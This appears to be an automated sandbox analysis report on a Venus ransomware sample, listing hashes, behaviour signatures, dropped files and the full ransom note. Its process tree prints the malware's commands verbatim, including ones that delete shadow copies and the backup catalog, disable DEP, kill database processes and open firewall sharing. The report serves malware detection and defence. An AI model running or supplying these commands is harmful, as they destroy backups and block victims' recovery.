Analysis

  • max time kernel
    130s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240611-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    15-06-2024 11:39

General

  • Target
    d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
  • Size
    225KB
  • MD5
    67b1a741e020284593a05bc4b1a3d218
  • SHA1
    401e6815bbc62b092f96e93e9535f09d77aa4522
  • SHA256
    d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb
  • SHA512
    fc35cac1f925df0a516b4694658fc31a5fdb41ef8dee2a7d37d194e05ee06ec0f054494872f991ef90b46af7ee9ba0e2bd79a8c9109ca18d556f8b99be76067e
  • SSDEEP
    6144:w4bJmXqQwAhojkJZkYiV50DEruMxgTw7ozFD254W:w4NeqQwAhZb9DOGcopfW

Malware Config

Extracted

  • Path
    C:\Users\Admin\AppData\Local\Temp\16002032821972527219.hta
  • Ransom Note
    <<<Venus>>> We stole and encrypted your data, if you do not contact us within 48 hours we will sell your data on the dark net. Only we can decrypt your data. IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam. ----------------------------------------------------- Contact and send this file to us: email:[email protected]
  • Emails

Signatures

  • Venus

    Venus is a ransomware family first seen in 2022.

  • Venus Ransomware 5 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Renames multiple (8350) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 36 IoCs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 6 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of SetWindowsHookEx 21 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
    "C:\Users\Admin\AppData\Local\Temp\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Windows\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
      "C:\Windows\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3416
      • C:\Windows\System32\cmd.exe
        /C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
          4⤵
          • Modifies Windows Firewall
          • Drops file in Windows directory
          PID:352
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1072
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:7156
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:7112
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:64
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:7152
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6240
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\16002032821972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:2704
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:2496
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:6996
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\AssertJoin.hta
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:3660
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5080
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6576
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:3280
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6428
      • C:\Windows\SysWOW64\werfault.exe
        werfault.exe /h /shared Global\ebe01ee9df8146fca5cc760a7a0ac855 /t 6880 /p 2704
        1⤵
          PID:6824

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml.venus
    Filesize: 3.3MB
    MD5: 93c9018a9cb7bcb9046d96a96fc3d30e
    SHA1: 230e373c6c3df170b986d787800e321e5471128c
    SHA256: 82d58fba77ef3667836591e1103290dad8765a08235df8af6f66461441daa20a
    SHA512: 1dbf0d037372f5bc1a75a5baf669d2b5f8cee7335f9311a67829faaba5d8cb5a6c02074a1a150917f2a4f40baeebaa138abf17955226fd8f431e7a3552100a2b

  • C:\Users\Admin\AppData\Local\Temp\16002032821972527219.hta
    Filesize: 1KB
    MD5: cae840739bc07d89b2ba34b59364486b
    SHA1: a44d6b28679482dd20159dcbf9fe3d634a10e267
    SHA256: b6a3cb7f7622b28c8404d3a5a57e9b7c31681e9b7f07d5f3dea4d107923861a5
    SHA512: ce2f0b67af259aa8be2f21777b112c57caa0650e0f3e207557ad45483122830391e2ea72528600ae810526342f6b434ab0f5707f6faf2694267dca0480526601

  • C:\Windows\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
    Filesize: 225KB
    MD5: 67b1a741e020284593a05bc4b1a3d218
    SHA1: 401e6815bbc62b092f96e93e9535f09d77aa4522
    SHA256: d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb
    SHA512: fc35cac1f925df0a516b4694658fc31a5fdb41ef8dee2a7d37d194e05ee06ec0f054494872f991ef90b46af7ee9ba0e2bd79a8c9109ca18d556f8b99be76067e

  • \Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-1453213197-474736321-1741884505-1000\desktop.ini
    Filesize: 4KB
    MD5: 1c5d0a5da9b903810751decf30cd308f
    SHA1: 3e7054b0a6ab3d835388d0ad5cd1eef6d74cf228
    SHA256: 34b56b9e5fcecc8337c142a3bf455f123d2e610c659699cd5126e44763161714
    SHA512: 5469af14074d2cd69f73f8f4b035c485d086ecd04c418f0631f9f788edd0404c859d9f97df76e7a2674250ed5a16539e19ffe94d01b48236d0e02a81371368dd

  • memory/1392-0-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize: 248KB

  • memory/1392-31-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize: 248KB

  • memory/3416-30-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize: 248KB

  • memory/3416-4500-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize: 248KB